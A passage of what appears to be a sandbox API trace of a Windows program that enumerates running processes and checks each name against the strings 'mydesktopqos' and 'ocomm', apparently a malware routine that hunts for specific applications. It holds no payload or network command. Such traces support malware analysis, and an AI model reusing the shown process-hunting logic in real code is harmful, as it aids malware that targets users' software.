th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0095.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.669] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35736b0 [0095.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35736b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0095.669] StrStrIA (lpFirst="dllhost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.669] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.671] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35737d0 [0095.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35737d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.671] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopqos") returned 0x0 [0095.671] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0095.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.673] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35736c8 [0095.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35736c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0095.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0095.673] StrStrIA (lpFirst="UsoClient.exe", lpSrch="mydesktopqos") returned 0x0 [0095.673] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.675] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573860 [0095.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3573860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.675] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopqos") returned 0x0 [0095.675] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0095.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0095.678] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3574a08 [0095.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3574a08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0095.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0095.678] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="mydesktopqos") returned 0x0 [0095.678] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0095.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.680] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3574a68 [0095.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3574a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0095.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0095.682] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="mydesktopqos") returned 0x0 [0095.682] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0095.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0095.686] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356ab78 [0095.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356ab78, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0095.686] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0095.686] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="mydesktopqos") returned 0x0 [0095.686] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.688] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573950 [0095.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573950, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.688] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.688] StrStrIA (lpFirst="conhost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.688] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0095.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.689] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573800 [0095.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3573800, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0095.689] StrStrIA (lpFirst="conhost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.689] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0095.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.691] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35737e8 [0095.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35737e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0095.691] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0095.691] StrStrIA (lpFirst="rxodge.exe", lpSrch="mydesktopqos") returned 0x0 [0095.691] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0095.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.692] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573788 [0095.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3573788, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0095.692] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0095.692] StrStrIA (lpFirst="sppsvc.exe", lpSrch="mydesktopqos") returned 0x0 [0095.692] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0095.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.693] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574ba8 [0095.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3574ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0095.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0095.693] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="mydesktopqos") returned 0x0 [0095.693] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0095.694] CloseHandle (hObject=0x350) returned 1 [0095.694] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0095.714] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.716] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35749c8 [0095.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x35749c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0095.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0095.716] StrStrIA (lpFirst="[System Process]", lpSrch="ocomm") returned 0x0 [0095.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0095.717] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574e20 [0095.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574e20, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0095.717] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0095.717] StrStrIA (lpFirst="System", lpSrch="ocomm") returned 0x0 [0095.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0095.719] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35736f8 [0095.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35736f8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0095.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0095.719] StrStrIA (lpFirst="smss.exe", lpSrch="ocomm") returned 0x0 [0095.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.721] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573830 [0095.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3573830, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.721] StrStrIA (lpFirst="csrss.exe", lpSrch="ocomm") returned 0x0 [0095.721] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.725] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573878 [0095.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3573878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0095.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0095.725] StrStrIA (lpFirst="wininit.exe", lpSrch="ocomm") returned 0x0 [0095.725] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.726] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573890 [0095.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3573890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0095.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0095.727] StrStrIA (lpFirst="csrss.exe", lpSrch="ocomm") returned 0x0 [0095.727] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.728] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35738a8 [0095.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35738a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0095.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0095.728] StrStrIA (lpFirst="winlogon.exe", lpSrch="ocomm") returned 0x0 [0095.728] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.729] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35738c0 [0095.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35738c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0095.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0095.729] StrStrIA (lpFirst="services.exe", lpSrch="ocomm") returned 0x0 [0095.729] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.730] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573740 [0095.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3573740, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0095.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0095.730] StrStrIA (lpFirst="lsass.exe", lpSrch="ocomm") returned 0x0 [0095.730] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.731] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573758 [0095.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573758, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.731] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.731] StrStrIA (lpFirst="svchost.exe", lpSrch="ocomm") returned 0x0 [0095.732] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0095.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.733] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35738d8 [0095.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, 